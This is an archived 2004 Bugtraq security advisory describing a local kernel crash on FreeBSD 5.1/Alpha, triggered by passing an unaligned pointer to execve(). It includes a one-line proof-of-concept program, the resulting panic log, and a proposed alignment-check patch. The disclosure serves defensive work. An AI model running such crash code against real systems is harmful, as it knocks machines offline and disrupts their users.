| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 24 Jun 2004 23:12:19 +0200
From: Marceta Milos <root@...cetam.net>
To: bugtraq@...urityfocus.com
Subject: Security Advisory: FreeBSD local DoS
Security Advisory: FreeBSD local DoS
Systems affected:
FreeBSD 5.1-RELEASE/Alpha. Other versions are probably vulnerable.
FreeBSD 5.1-RELEASE/IA32 is _not_ vulnerable.
Not sure about other FreeBSD/arch but they could be vulnerable too.
Risk: low
Date: 24 June 2004
Legal notice:
1. This Advisory is Copyright (c) 2004 Marceta Milos.
2. You may distribute it unmodified.
3. You may not modify it and distribute it or distribute
parts of it without the author's permission.
4. This document stays open for revision. Anything may
change without notice. For a possible update you may
visit author's homepage which should be redesigned soon.
Disclaimer:
I am not responsible for any damage caused by use
of the information provided by this document.
Description:
It is possible to crash kernel on FreeBSD/Alpha, by passing unaligned
memory address as a 2nd or 3rd argument to execve() syscall.
Condition:
To crash the system, first arg of execve() must point to accessible filename.
Demonstration code:
# cat kernkill.c
/*
* FreeBSD/Alpha local DoS
* by Marceta Milos
* root@...cetam.net
*
*/
char main() { execve("/bin/ls",(int *)(main + 1), 0); }
/* eof */
# gcc kernkill.c -o kk
#./kk
fatal kernel trap:
trap entry = 0x4 (unaligned access fault)
cpuid = 0
faulting va = 0x120000891
opcode = 0x29
register = 0x0
pc = 0xfffffc0000651bf0
ra = 0xfffffc00004900e0
sp = 0xfffffe0039c3f840
usp = 0x11fffae0
curthread = 0xfffffc00620a3720
pid = 713, comm = kk
panic: trap
cpuid = 0;
syncing disks, buffers remaining... 234 234 232 232 232 232 231 232 231 231 231
231 231 231 231 231 231 231 231 231 231 231 231 231 231 231 231 231
giving up on 141 buffers
Uptime: 13m13s
Automatic reboot in 15 seconds - press a key on the console to abort
Rebooting...
Workaround:
You may make a proper use of ALIGNED_POINTER macro which already exists in
src/sys/alpha/include/param.h to check if ptrs are aligned, or make your
own like:
#define PTR_ALIGNED(x) (((x) & 0x7) == 0)
Putting the following line at the top of execve() in src/sys/kern/kern_exec.c
should prevent the crash (unfortunatly, this is not tested. Idea is mine, a
little corrected by Mr. Dag-Erling Smørgrav, FreeBSD deputy security officer):
if (!PTR_ALIGNED(uap->argv) || !PTR_ALIGNED(uap->envv))
return (EFAULT);
Vendor status: FreeBSD was notified on Sat 19/06/2004 23:50 -0000
Greets to: LSD, teso, phenoelit, synnergy, thc, netric, scut, silvio, stinger && eSDee.
Powered by blists - more mailing lists